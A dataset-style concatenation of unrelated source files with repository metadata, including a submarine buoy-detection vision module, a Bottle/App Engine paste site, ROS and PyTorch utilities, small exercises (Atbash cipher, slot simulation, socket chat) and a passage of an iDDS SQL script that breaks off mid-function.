] | permissive | wpfhtl/software | 4dd5d116a1c90660264b32006617a6809b0a530e | 575d424be6b497e0f34f7297a9b322567c2e26c0 | refs/heads/master | 2021-01-23T02:40:49.542461 | 2016-04-15T04:16:21 | 2016-04-15T04:16:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 856 | py | import shm
from vision.modules import ModuleBase, buoy_common
from vision import options
# Camera feed this vision module consumes.
capture_source = 'forward'
# Tunables: HLS hue window, Lab a/b windows, then contour-filter thresholds.
options = [options.IntOption('hls_h_min', 105, 0, 255),
           options.IntOption('hls_h_max', 143, 0, 255),
           options.IntOption('lab_a_min', 127, 0, 255),
           options.IntOption('lab_a_max', 235, 0, 255),
           options.IntOption('lab_b_min', 3, 0, 255),
           options.IntOption('lab_b_max', 123, 0, 255),
           options.IntOption('min_area', 100, 0, 1000000),
           options.DoubleOption('min_circularity', 0.5, 0, 1),
           options.BoolOption('verbose', False)
           ]
class YellowBuoy(ModuleBase.ModuleBase):
    # Vision module locating the yellow buoy; results land in shared memory.
    def __init__(self, logger):
        super(YellowBuoy, self).__init__(options, True)
    def process(self, mat):
        # Delegate to the shared buoy pipeline, writing into shm results.
        buoy_common.process(self, mat, shm.yellow_buoy_results)
| [
"software@cuauv.org"
] | software@cuauv.org |
4e050d2bbdac743366012d0ff8e56b35566b6b0e | bbc7d39cea6dadae9b2ffb114c8474c9c3b6d305 | /main.py | 885f10bc222b0b9e40e7bbd1e9cc7f2d1ce9c6d6 | [] | no_license | jfriedly/paste-math | 0018890c5bab2dd31a817a3aca6ac020c7e9613c | 0b171433fee5aefd562cfd730f969cf931ce86c1 | refs/heads/master | 2021-01-16T00:49:49.269091 | 2013-02-19T22:34:48 | 2013-02-19T22:34:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,623 | py | from lib import bottle
from lib.bottle import route, template, request, error, debug, static_file
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.api.app_identity import get_default_version_hostname
import lib.db
from lib.html import addLineBreaks
from google.appengine.api import users
import datetime
import logging
# Shorthand for "now", used when timestamping Page entities.
today=datetime.datetime.today
# Bare attribute bag used to fake a Page when a datastore lookup misses.
class Object():
    pass
@route('/')
def index():
    """Front page: published pages for visitors, everything for admins."""
    if not users.is_current_user_admin():
        # Visitors only see published pages, newest first.
        q = lib.db.q("SELECT * FROM Page WHERE published = True ORDER BY timestamp DESC")
        #q = lib.db.Page.all()
        result = [[p.url, p.title] for p in q.run()]
        output = template('templates/index', rows=result, users=users)
    else:
        # Admins get every page (drafts included) plus the todo list.
        #result = lib.db.q("SELECT * FROM Page")
        q = lib.db.Page.all()
        q.order('-timestamp')
        todo = lib.db.Todo.all()
        result = [[p.url, p.title, p.published] for p in q.run()]
        output = template('templates/admin', rows=result, users=users, todo=todo)
    return output
@route('/show/:name')
def show(name):
    """Render the page stored under *name* with the show_page template."""
    # NOTE(review): this admin check is a no-op (`pass` either way);
    # presumably access control was intended here -- confirm.
    if not users.is_current_user_admin():
        pass
    q = lib.db.Page.gql("WHERE url = :1", name)
    p = q.get()
    if not p:
        # Substitute a stub object so the template always has its fields.
        p = Object()
        p.title = "Unknown Page"
        p.content = "This page does not exist."
    title = p.title
    content = addLineBreaks(p.content)
    return template('templates/show_page.tpl', title=title, body=content)
    #content = convertList(lst)
@route('/view/:name')
def view(name):
    """Read-only rendering of the page stored under *name*."""
    q = lib.db.Page.gql("WHERE url = :1", name)
    p = q.get()
    if not p:
        # Substitute a stub object so the template always has its fields.
        p = Object()
        p.title = "Unknown Page"
        p.content = "This page does not exist."
    title = p.title
    content = addLineBreaks(p.content)
    return template('templates/view_page.tpl', title=title, body=content)
    #content = convertList(lst)
@route('/new', method='GET')
def new():
    # Render the blank editor used to author a brand-new page.
    return template('templates/new_preview.tpl')
@route('/new', method='POST')
def new_post():
    """Persist a newly authored page.

    'save' stores it as an unpublished draft; 'publish' makes it public.
    The two buttons previously duplicated the entire body -- only the
    `published` flag actually differs, so they are folded together.
    """
    if request.POST.get('save', '').strip():
        published = False
    elif request.POST.get('publish', '').strip():
        published = True
    else:
        return  # no recognised submit button (original fell through too)
    title = request.POST.get('title', '').strip()
    data = request.POST.get('data', '').strip()
    url = lib.db.getUrlString()
    lib.db.Page(title=title, content=data, url=url, published=published, timestamp=today()).put()
    message = '<p>The new page was inserted into the database, \
        the ID is %s</p>' % (url)
    return template('templates/submit.tpl', body=message,
                    data=addLineBreaks(data), title=title, url=url)
@route('/todo', method='GET')
def new():
    # NOTE(review): redefines the module-level name `new` from the '/new'
    # handler; bottle routes by path, so both URLs still work.
    body = '''
    <p>Add a new task to the ToDo list:</p>
    <form action="/todo" method="POST">
    Title: <br>
    <input type="text" name="title"><br>
    Body: <br>
    <textarea name="data" cols="80" rows="20">
    </textarea>
    <br />
    <input type="submit" name="save" value="save">
    </form>
    '''
    return template('templates/simple.tpl', body=body)
@route('/todo', method='POST')
def new_post():
    """Store a new Todo entity from the submitted form."""
    # NOTE(review): this also shadows the '/new' POST handler's name.
    if request.POST.get('save','').strip():
        title = request.POST.get('title', '').strip()
        data = request.POST.get('data', '').strip()
        lib.db.Todo(title=title, content=data, open=True).put()
        message = '<p>The new task was inserted into the database</p>'
        return template('templates/simple.tpl', body=message)
@route('/edit/:name', method='GET')
def edit(name):
    """Show the edit form for page *name* (blank fields if it doesn't exist)."""
    q = lib.db.Page.gql("WHERE url = :1", name)
    p = q.get()
    if not p:
        p = Object()
        p.title = ""
        p.content = ""
    title = p.title
    content = p.content
    #lib.db.d(p)
    return template('templates/edit_preview.tpl', name=name, body=content, url=name, title=title, data=addLineBreaks(content))
#@route('/edit_old/:name', method='GET')
#def edit(name):
# q = lib.db.Page.gql("WHERE url = :1", name)
# p = q.get()
# title = p.title
# content = p.content
# return template('templates/edit_active.tpl', name=name, body=content, url=name, title=title)
@route('/edit/:name', method='POST')
def edit_post(name):
    """Store the edited page.

    'save' keeps it unpublished, 'publish' makes it public; everything
    else (field handling, messaging, datastore write) was duplicated
    verbatim across the two branches, so it is folded into one path
    driven by a `published` flag.
    """
    if request.POST.get('save', '').strip():
        published = False
    elif request.POST.get('publish', '').strip():
        published = True
    else:
        return  # no recognised submit button (original fell through too)
    title = request.POST.get('title', '').strip()
    data = request.POST.get('data', '').strip()
    url = request.POST.get('url', '').strip()
    q = lib.db.Page.gql("WHERE url = :1", name)
    p = q.get()
    lib.db.d(p)
    if url == name:
        message = '<p>The ID %s was successfully updated</p>' % (url)
    else:
        message = '<p>The new task was inserted into the database, the ID is %s</p>' % (url)
    # NOTE(review): a fresh Page entity is written even for "updates";
    # the existing row is never modified in place.  Behaviour preserved.
    lib.db.Page(title=title, content=data, url=url, published=published, timestamp=today()).put()
    return template('templates/submit.tpl', body=message,
                    data=addLineBreaks(data), title=title, url=url)
@route('/help')
def help():
    """Serve the static help page.

    BUG FIX: the original called static_file() without returning its
    response object, so the route always produced an empty body.
    """
    return static_file('help.html', root='.')
@route('/static/<filename>')
def static(filename):
    # Serve assets (css/js/images) from the ./static directory.
    return static_file(filename, root='static')
@route('/json:json#[1-9]+#')
def show_json(json):
    """Return the paste with the given numeric id as a JSON-able dict.

    Fixes: sqlite3 was never imported at module level (NameError on
    first request); the query parameter was passed as `(json)` -- a
    parenthesised string, not a tuple, which breaks for ids with more
    than one digit; the connection was never closed.
    """
    import sqlite3  # local import: module is absent from the top-level imports
    conn = sqlite3.connect('math.db')
    try:
        c = conn.cursor()
        c.execute("SELECT data FROM paste WHERE id LIKE ?", (json,))
        result = c.fetchall()
        c.close()
    finally:
        conn.close()
    if not result:
        return {'task': 'This item number does not exist!'}
    else:
        return {'Task': result[0]}
def main():
    """Configure bottle error handling and hand the WSGI app to App Engine."""
    #Find a way to check if dev server.
    if get_default_version_hostname() == 'localhost:8080':
        # Local dev server: show tracebacks in responses.
        debug(True)
    else:
        # Production: register a friendly 500 handler instead.
        @error(500)
        def Error500(code):
            logging.error('There was an internal server error')
            message = 'Internal Server Error'
            return template('templates/simple.tpl', body=message)
    run_wsgi_app(bottle.default_app())
@error(403)
def Error403(code):
    # Friendly page for forbidden requests.
    logging.warning('There was a 403')
    message = 'Get your codes right dude, you caused some error!'
    return template('templates/simple.tpl', body=message)
@error(404)
def Error404(code):
    # Friendly page for unknown URLs.
    logging.warning('There was a 404')
    message = 'Stop cowboy, what are you trying to find?'
    return template('templates/simple.tpl', body=message)
if __name__=="__main__":
    main()
"schwendenman.paul@gmail.com"
] | schwendenman.paul@gmail.com |
a3bc08a2eea2aaf15b870cf2f660a74a25c7333c | e79888cd68177e7ec5125270cdc52f888e211e78 | /kiyuna/chapter04/knock32.py | 4831c290a1a6a476a9d47fec6053cfb790a309a1 | [] | no_license | cafenoctua/100knock2019 | ec259bee27936bdacfe0097d42f23cc7500f0a07 | 88717a78c4290101a021fbe8b4f054f76c9d3fa6 | refs/heads/master | 2022-06-22T04:42:03.939373 | 2019-09-03T11:05:19 | 2019-09-03T11:05:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 590 | py | '''
32. 動詞の原形
動詞の原形をすべて抽出せよ.
'''
import sys
from knock30 import mecab_into_sentences
def message(text):
    """Print *text* to stderr wrapped in bright-green ANSI escape codes."""
    print(f"\33[92m{text}\33[0m", file=sys.stderr)
if __name__ == '__main__':
    # Collect the base form of every verb ('動詞') in the parsed corpus.
    tgt = '動詞'
    res = []
    for sentence in mecab_into_sentences():
        # Not memory-friendly, but keeps the nesting shallow.
        res.extend([d['base'] for d in sentence if d['pos'] == tgt])
    message(f'{tgt}の原形の数: {len(res)}')
    message(f'{tgt}の原形の種類: {len(set(res))}')
    print('上から10個 ->', *res[:10])
| [
"kyuna.prog@gmail.com"
] | kyuna.prog@gmail.com |
828e05d68fa7676fef57ac1f7c5ee4227f6f8f37 | 3ba03246e8ddf25b4f7607d072efad7dfdeb7a85 | /cbf_control/src/main.py | 59213d3470510c8c3ce432c023ab31f43e3a16c0 | [] | no_license | Jaroan/PR2_CBF | c1961c928547cd685e8c7c46452c6c2639764dce | 22b644d1462363bf3594cfe22e6069f22f9931e1 | refs/heads/master | 2021-10-08T16:57:03.671254 | 2018-12-15T04:01:31 | 2018-12-15T04:01:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,032 | py | import rospy
from std_msgs.msg import Float32MultiArray, MultiArrayDimension
import time
from optimizer import Optimizer
def forward_kinematics_func(q):
    """Return the forward-kinematics response for joint vector *q*.

    BUG FIX: the original computed the FK response and dropped it into
    an unused local; it is now returned to the caller.
    NOTE(review): GetFK is not imported anywhere in this module --
    confirm where it is supposed to come from.
    """
    gfk = GetFK('l_wrist_roll_link', 'base_link')
    return gfk.get_current_fk(q)
def publisher():
    """Publish one flattened 2x7 joint-trajectory message on 'trajectory'."""
    rospy.init_node('trajectory')
    pub = rospy.Publisher('trajectory', Float32MultiArray, queue_size=1)
    rate = rospy.Rate(100)
    num_points = 2
    # Layout: `num_points` rows of 7 joint values each, flattened row-major.
    t = Float32MultiArray()
    t.layout.dim.append(MultiArrayDimension(
        size=num_points, stride=num_points*7, label="points"))
    t.layout.dim.append(MultiArrayDimension(size=7, stride=7, label="joints"))
    t.layout.data_offset = 0
    t.data = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
        -0.7853981633974483, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
    print(t)
    # while not rospy.is_shutdown():
    #     pub.publish(t)
    #     rate.sleep()
    # Give subscribers time to connect before the single publish.
    time.sleep(3)
    pub.publish(t)
if __name__ == '__main__':
    try:
        publisher()
    except rospy.ROSInterruptException:
        # Normal shutdown path when ROS interrupts the node.
        pass
| [
"varagrawal@gmail.com"
] | varagrawal@gmail.com |
cebb283734b02844e2039ccc368112a270cb896b | c39e466c2b6fdffbc410f24669f214e13fb87781 | /PYTHON/TEMA 4/Unit4_examples/Unit4_Functions_example1.py | 61c8f70816785dcaa93e7f65f5fccf3266b2d112 | [] | no_license | enanibus/biopython | 3a58efbcc92f1ce60285a115c620de9295b7d281 | 613d334a5c0502059930d9381a9464ef533cca1c | refs/heads/master | 2021-01-12T17:27:39.516793 | 2017-01-02T18:30:09 | 2017-01-02T18:30:09 | 71,573,732 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | def Media (NumberList):
    # Accumulate the total by hand, then divide by the element count.
    suma=0
    for n in NumberList:
        suma=suma+n
    # Note: raises ZeroDivisionError for an empty list.
    result=suma/len(NumberList)
    return(result)
# Weights of the ten students in section 4Bq; print their average.
Weight4Bq=[70,47,68,56,87,49,48,71,65,62]
AverageWeight4Bq=Media(Weight4Bq)
print(AverageWeight4Bq)
| [
"juanenriqueztraba@gmail.com"
] | juanenriqueztraba@gmail.com |
9222ee7ff2fb1829be3106e311fbfe64e0ed86d0 | 96b4b1339e745fe15d898f301a65a002898d7a70 | /Project4/alt_solns/Final/prob1_sim.py | 442a9b5c20ac3a839a9ce36852de8c5ff993d629 | [] | no_license | abusa1101/AI-coding-problems | 8ace849ec236a059278d684bba644471f99d1979 | d4bfa45ddc2fa1aecbf15161fcea4cb92db8dec1 | refs/heads/master | 2023-08-25T19:28:56.851217 | 2021-10-06T20:39:51 | 2021-10-06T20:39:51 | 235,749,527 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,318 | py | import random as rd
def simulate_slots():
    """Play a $1-per-pull slot machine starting from a $10 balance.

    Three bars/bells/lemons pay 20/15/5; one, two or three leading
    cherries pay 1, 2 or 3.  Returns the number of plays made before
    the balance hits zero.
    """
    plays = 0
    coins = 10
    payout_triple = {"bar": 20, "bell": 15, "lemon": 5, "blank": 0}
    while coins:
        coins -= 1
        plays += 1
        reels = ["bar", "bell", "lemon", "cherry", "blank", "blank", "blank", "blank"]
        wheels = [rd.choice(reels) for _ in range(3)]
        if wheels[0] == "cherry":
            # Cherries pay per leading run: 1, 2 or 3 coins.
            if wheels[1] != "cherry":
                coins += 1
            elif wheels[2] != "cherry":
                coins += 2
            else:
                coins += 3
        elif wheels[0] == wheels[1] == wheels[2]:
            coins += payout_triple[wheels[0]]
    return plays
# Monte-Carlo estimate: run the simulation many times and report the
# mean and median number of plays per $10 bankroll.
TRIES = 10000
VAL = []
for x in range(TRIES):
    VAL.append(simulate_slots())
MEAN = sum(VAL) / float(TRIES)
N = len(VAL)
VAL.sort()
# Median: average the two middle values when the sample size is even.
if N % 2 == 0:
    MEDIAN1 = VAL[N//2]
    MEDIAN2 = VAL[N//2 - 1]
    MEDIAN = (MEDIAN1 + MEDIAN2)/2
else:
    MEDIAN = VAL[N//2]
print("Tries, Mean, Median: %s, %s, %s" % (TRIES, MEAN, MEDIAN))
| [
"abusa@umich.edu"
] | abusa@umich.edu |
7455a9c2dc2c361c1d554d1309ffd459284caa46 | fb3ff12389925480a19b11e6bb51ea760b7af729 | /chat2.py | 23914506991017343a3779cb057d01b0ca95d14a | [] | no_license | sd8917/web_project | 60a353a2bc24600a183a9653765612c5809e9634 | 18228db4980aa7733f2d668d1cb8201df13ec493 | refs/heads/master | 2020-03-31T20:53:06.384469 | 2018-10-11T09:09:12 | 2018-10-11T09:09:12 | 152,559,275 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | py | import socket
# Simple chat client: connect to the local server, then alternate
# receiving a message and sending a typed reply.
s = socket.socket()
host = socket.gethostname()
port = 12345
s.connect((host, port))
while True:
    # BUG FIX: decode the received bytes properly.  The original did
    # str(bytes).strip('b').strip("'"), which also eats any real
    # leading/trailing b/quote characters and leaves escape sequences.
    data = s.recv(1024).decode('utf-8')
    print(data)
    messg = bytes("sudhanshu : " + input(r""), encoding='utf-8')
    s.send(messg)
"sudhanshuraj8917@gmail.com"
] | sudhanshuraj8917@gmail.com |
459a5c19a5b75157ec9aa8f5eef3223c4ec4fba3 | a63e24d4d6521e98e1b79c2528ab6f08d5add66c | /kps2d_detection/hr_net/lib/utils/utils.py | 9561baa3f456005004fd3a5a38d49dcc505e5f43 | [
"MIT"
] | permissive | abrichr/cvToolkit | 7d3f2e593d3132aae8c519c024383b0f269eeda6 | 7f559138c27fedf9e3e3929cd4d6e4f8198d4c51 | refs/heads/master | 2022-07-19T00:45:52.036959 | 2020-05-26T06:02:24 | 2020-05-26T06:02:24 | 266,943,746 | 0 | 0 | MIT | 2020-05-26T04:24:25 | 2020-05-26T04:24:25 | null | UTF-8 | Python | false | false | 7,023 | py | # ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by Bin Xiao (Bin.Xiao@microsoft.com)
# ------------------------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import logging
import time
from collections import namedtuple
from pathlib import Path
import torch
import torch.optim as optim
import torch.nn as nn
def create_logger(cfg, cfg_name, phase='train'):
    """Build the run's output directory, file logger and tensorboard dir.

    Returns (logger, final_output_dir, tensorboard_log_dir); both
    directory values are returned as plain strings.
    """
    root_output_dir = Path(cfg.OUTPUT_DIR)
    # set up logger
    if not root_output_dir.exists():
        print('=> creating {}'.format(root_output_dir))
        root_output_dir.mkdir()
    # The '\' continuation binds the ternary to the whole expression:
    # DATASET + '_' + HYBRID only when HYBRID_JOINTS_TYPE is truthy.
    dataset = cfg.DATASET.DATASET + '_' + cfg.DATASET.HYBRID_JOINTS_TYPE \
        if cfg.DATASET.HYBRID_JOINTS_TYPE else cfg.DATASET.DATASET
    dataset = dataset.replace(':', '_')
    model = cfg.MODEL.NAME
    cfg_name = os.path.basename(cfg_name).split('.')[0]
    final_output_dir = root_output_dir / dataset / model / cfg_name
    print('=> creating {}'.format(final_output_dir))
    final_output_dir.mkdir(parents=True, exist_ok=True)
    time_str = time.strftime('%Y-%m-%d-%H-%M')
    log_file = '{}_{}_{}.log'.format(cfg_name, time_str, phase)
    final_log_file = final_output_dir / log_file
    head = '%(asctime)-15s %(message)s'
    logging.basicConfig(filename=str(final_log_file),
                        format=head)
    logger = logging.getLogger()
    logger.setLevel(logging.INFO)
    # Mirror log records to the console as well as the file.
    console = logging.StreamHandler()
    logging.getLogger('').addHandler(console)
    tensorboard_log_dir = Path(cfg.LOG_DIR) / dataset / model / \
        (cfg_name + '_' + time_str)
    print('=> creating {}'.format(tensorboard_log_dir))
    tensorboard_log_dir.mkdir(parents=True, exist_ok=True)
    return logger, str(final_output_dir), str(tensorboard_log_dir)
def get_optimizer(cfg, model):
    """Build the optimizer named by cfg.TRAIN.OPTIMIZER ('sgd' or 'adam').

    Any other name yields None, mirroring the original behaviour.
    """
    chosen = cfg.TRAIN.OPTIMIZER
    if chosen == 'sgd':
        return optim.SGD(
            model.parameters(),
            lr=cfg.TRAIN.LR,
            momentum=cfg.TRAIN.MOMENTUM,
            weight_decay=cfg.TRAIN.WD,
            nesterov=cfg.TRAIN.NESTEROV,
        )
    if chosen == 'adam':
        return optim.Adam(model.parameters(), lr=cfg.TRAIN.LR)
    return None
def save_checkpoint(states, is_best, output_dir,
                    filename='checkpoint.pth'):
    """Serialize *states* into *output_dir* under *filename*.

    When *is_best* is set and *states* carries a 'state_dict' key, the
    best weights are additionally written to 'model_best.pth'.
    """
    torch.save(states, os.path.join(output_dir, filename))
    if is_best and 'state_dict' in states:
        best_path = os.path.join(output_dir, 'model_best.pth')
        torch.save(states['best_state_dict'], best_path)
def get_model_summary(model, *input_tensors, item_length=26, verbose=False):
    """Summarize per-layer parameters and multiply-adds of *model*.

    Registers a forward hook on every leaf module, runs one forward pass
    with *input_tensors*, then totals parameter counts and (for Conv and
    Linear layers) multiply-add counts.  Returns the report as a string;
    with verbose=True it also includes a per-layer table.
    """
    summary = []
    ModuleDetails = namedtuple(
        "Layer", ["name", "input_size", "output_size", "num_parameters", "multiply_adds"])
    hooks = []
    layer_instances = {}
    def add_hooks(module):
        # Hook that records one ModuleDetails row per forward call.
        def hook(module, input, output):
            class_name = str(module.__class__.__name__)
            # Number repeated layer types: Conv2d_1, Conv2d_2, ...
            instance_index = 1
            if class_name not in layer_instances:
                layer_instances[class_name] = instance_index
            else:
                instance_index = layer_instances[class_name] + 1
                layer_instances[class_name] = instance_index
            layer_name = class_name + "_" + str(instance_index)
            params = 0
            if class_name.find("Conv") != -1 or class_name.find("BatchNorm") != -1 or \
               class_name.find("Linear") != -1:
                for param_ in module.parameters():
                    params += param_.view(-1).size(0)
            flops = "Not Available"
            if class_name.find("Conv") != -1 and hasattr(module, "weight"):
                flops = (
                    torch.prod(
                        torch.LongTensor(list(module.weight.data.size()))) *
                    torch.prod(
                        torch.LongTensor(list(output.size())[2:]))).item()
            elif isinstance(module, nn.Linear):
                flops = (torch.prod(torch.LongTensor(list(output.size()))) \
                         * input[0].size(1)).item()
            if isinstance(input[0], list):
                input = input[0]
            if isinstance(output, list):
                output = output[0]
            summary.append(
                ModuleDetails(
                    name=layer_name,
                    input_size=list(input[0].size()),
                    output_size=list(output.size()),
                    num_parameters=params,
                    multiply_adds=flops)
            )
        # Only hook leaf-ish modules; containers and the root would
        # double-count their children.
        if not isinstance(module, nn.ModuleList) \
           and not isinstance(module, nn.Sequential) \
           and module != model:
            hooks.append(module.register_forward_hook(hook))
    model.apply(add_hooks)
    space_len = item_length
    # One forward pass populates `summary` via the hooks.
    model(*input_tensors)
    for hook in hooks:
        hook.remove()
    details = ''
    if verbose:
        details = "Model Summary" + \
            os.linesep + \
            "Name{}Input Size{}Output Size{}Parameters{}Multiply Adds (Flops){}".format(
                ' ' * (space_len - len("Name")),
                ' ' * (space_len - len("Input Size")),
                ' ' * (space_len - len("Output Size")),
                ' ' * (space_len - len("Parameters")),
                ' ' * (space_len - len("Multiply Adds (Flops)"))) \
            + os.linesep + '-' * space_len * 5 + os.linesep
    params_sum = 0
    flops_sum = 0
    for layer in summary:
        params_sum += layer.num_parameters
        if layer.multiply_adds != "Not Available":
            flops_sum += layer.multiply_adds
        if verbose:
            details += "{}{}{}{}{}{}{}{}{}{}".format(
                layer.name,
                ' ' * (space_len - len(layer.name)),
                layer.input_size,
                ' ' * (space_len - len(str(layer.input_size))),
                layer.output_size,
                ' ' * (space_len - len(str(layer.output_size))),
                layer.num_parameters,
                ' ' * (space_len - len(str(layer.num_parameters))),
                layer.multiply_adds,
                ' ' * (space_len - len(str(layer.multiply_adds)))) \
                + os.linesep + '-' * space_len * 5 + os.linesep
    details += os.linesep \
        + "Total Parameters: {:,}".format(params_sum) \
        + os.linesep + '-' * space_len * 5 + os.linesep
    details += "Total Multiply Adds (For Convolution and Linear Layers only): {:,} GFLOPs".format(flops_sum/(1024**3)) \
        + os.linesep + '-' * space_len * 5 + os.linesep
    details += "Number of Layers" + os.linesep
    for layer in layer_instances:
        details += "{} : {} layers ".format(layer, layer_instances[layer])
    return details
| [
"lxy5513@gmail.com"
] | lxy5513@gmail.com |
2954d8e87acd58471c0442c2ef128a0d55a74d62 | e00d8b1b7fc1d6425de2fe4538e84ccb9ccda452 | /itc/hebei_toll.py | 18b358874da6553e9bb06dd7a2c23613e0dbd413 | [] | no_license | yiruiduan/2018-07 | 64ffcc8988330bfd912bdf7f44d32ca3889a81d3 | 36471f3458abb96462021e3588ed2ebf9abfc739 | refs/heads/master | 2021-07-10T19:19:28.322710 | 2019-01-08T06:00:44 | 2019-01-08T06:00:44 | 135,425,614 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 812 | py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import xlwt
import re
workbook = xlwt.Workbook(encoding = 'ascii')
# Matches runs of CJK ideographs; used to pull the station name out of
# the '###' section-header lines.
pattern = re.compile(u'[\u4e00-\u9fa5]+')
with open("河北北京天津收费站.txt","r",encoding="utf-8") as f:
    for line in f:
        if line.startswith("###"):
            filterdata = re.findall(pattern, line)
            # One worksheet per section, named after the first Chinese
            # phrase found on the header line.
            worksheet = workbook.add_sheet(filterdata[0])
            worksheet.write(0,1,label="所属高速")
            worksheet.write(0, 2, label="高速名称")
            i=1
        # NOTE(review): assumes a '###' header precedes the first data
        # line; otherwise `worksheet` and `i` are unbound -- confirm the
        # input file always starts with a header.
        if line.startswith("所属高速:"):
            for j in range(3):
                # print(j)
                # print((line.strip().split(":")[j]))
                worksheet.write(i,j,label=line.strip().split(":")[j])
            i+=1
workbook.save("河北北京天津高速.xlsx")
| [
"yiruiduan@126.com"
] | yiruiduan@126.com |
bdd739e1d194e3350e8d261608f052aa2d1cd68a | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/atbash-cipher/780f7c2ca2024289b7e86d67c77cdb0a.py | f4cb4e0b4a787f169f151619ad13150dc07cb867 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 769 | py | import re
def decode(ciphertext):
    """Undo the Atbash cipher: mirror letters across the alphabet.

    Digits pass through unchanged; every other character is dropped.
    """
    plain = []
    for ch in ciphertext:
        if ch.isalpha():
            plain.append(chr(ord('a') + (ord('z') - ord(ch))))
        elif ch.isdigit():
            plain.append(ch)
    return ''.join(plain)
def encode(plaintext):
    """Atbash-encode *plaintext*.

    Lowercases input, mirrors letters across the alphabet, keeps digits,
    drops everything else, and groups output in 5-character blocks when
    it is longer than 5 characters.
    """
    encoded = ''
    for ch in plaintext.lower():
        if ch.isalpha():
            encoded += chr(ord('z') - (ord(ch) - ord('a')))
        elif ch.isdigit():
            encoded += ch
    if len(encoded) <= 5:
        return encoded
    chunks = [encoded[pos:pos + 5] for pos in range(0, len(encoded), 5)]
    return ' '.join(chunks)
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
0f7f10326711a4cf4fffb689aed806f4d12d3b06 | 632b94beca62f7c8af5ae1d1e8e095a352600429 | /build_isolated/moveit_commander/catkin_generated/pkg.develspace.context.pc.py | 74d5b57eac50e95ed76ceddf9025312701f4f5af | [] | no_license | Haoran-Zhao/US_UR3 | d9eb17a7eceed75bc623be4f4db417a38f5a9f8d | a0c25e1daf613bb45dbd08075e3185cb9cd03657 | refs/heads/master | 2020-08-31T07:02:45.403001 | 2020-05-27T16:58:52 | 2020-05-27T16:58:52 | 218,629,020 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | # generated from catkin/cmake/template/pkg.context.pc.in
# NOTE: auto-generated by catkin from pkg.context.pc.in -- edit the
# template, not this file.
CATKIN_PACKAGE_PREFIX = ""
# Empty-string sentinels: the generator leaves these blank when the
# package declares no include dirs, catkin deps or libraries.
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "moveit_commander"
PROJECT_SPACE_DIR = "/home/haoran/US_UR3/devel_isolated/moveit_commander"
PROJECT_VERSION = "1.0.1"
| [
"zhaohaorandl@gmail.com"
] | zhaohaorandl@gmail.com |
81bffd876a4fdc0b34dd8eb8599fa803daf88a30 | bd8bc7abe0f774f84d8275c43b2b8c223d757865 | /368_LargestDivisibleSubset/largestDivisibleSubset.py | 0e89bdcccb45f3131c6fcbaaeee76f58dde3360f | [
"MIT"
] | permissive | excaliburnan/SolutionsOnLeetcodeForZZW | bde33ab9aebe9c80d9f16f9a62df72d269c5e187 | 64018a9ead8731ef98d48ab3bbd9d1dd6410c6e7 | refs/heads/master | 2023-04-07T03:00:06.315574 | 2021-04-21T02:12:39 | 2021-04-21T02:12:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 473 | py | class Solution:
def largestDivisibleSubset(self, nums: List[int]) -> List[int]:
nums.sort()
# dp[i] 表示 nums[i] 的约数集合
dp = [[x] for x in nums]
ans = []
for i in range(len(nums)):
for j in range(i):
if nums[i] % nums[j] == 0 and len(dp[j]) + 1 > len(dp[i]):
dp[i] = dp[j] + [nums[i]]
if len(dp[i]) > len(ans):
ans = dp[i]
return ans
| [
"noreply@github.com"
] | excaliburnan.noreply@github.com |
f91fc4e82fe4ba7dd8fc849c4ffedc5c245bcd1a | 677fa54f9c8b48a813ff7b207817d1a3acc8ed25 | /main/lib/idds/tests/run_sql.py | 2e948042286c38b784fb2d53e1b239de536e453c | [
"Apache-2.0"
] | permissive | HSF/iDDS | 2a88cb35ebbf35c7e3427369a94c6b9d73c16182 | 193a95ec7ee154a2615fa8dcd99a79df5ddd3bec | refs/heads/master | 2023-08-31T11:10:10.410663 | 2023-08-25T14:03:17 | 2023-08-25T14:03:17 | 183,081,241 | 3 | 9 | NOASSERTION | 2023-09-14T11:55:03 | 2019-04-23T19:18:37 | Python | UTF-8 | Python | false | false | 1,990 | py | #!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0OA
#
# Authors:
# - Wen Guan, <wen.guan@cern.ch>, 2019
"""
performance test to insert contents.
"""
import json
import cx_Oracle
from idds.common.config import config_get
# from idds.core.contents import add_content
def get_subfinished_requests(db_pool):
    """Dump request metadata rows from the iDDS Oracle schema.

    Acquires a connection from *db_pool*, executes the final `sql`
    below (the earlier assignments are superseded experiments left in
    place), pretty-prints each row's JSON payload, then releases the
    connection.
    """
    connection = db_pool.acquire()
    req_ids = []
    # sql = """select request_id from atlas_IDDS.requests where status in (4,5) and scope!='hpo'"""
